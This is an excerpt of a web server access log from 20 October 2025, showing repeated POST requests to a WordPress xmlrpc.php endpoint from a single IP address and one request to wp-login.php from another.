196.251.85.75 - - [20/Oct/2025:10:26:20 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:21 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:21 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:22 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:22 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
87.98.128.22 - - [20/Oct/2025:10:26:23 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:23 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:24 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:24 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:24 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:25 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:25 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:26 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:26 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.85.75 - - [20/Oct/2025:10:26:27 -0400] "POST //xmlrpc.php HTTP/2.0" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
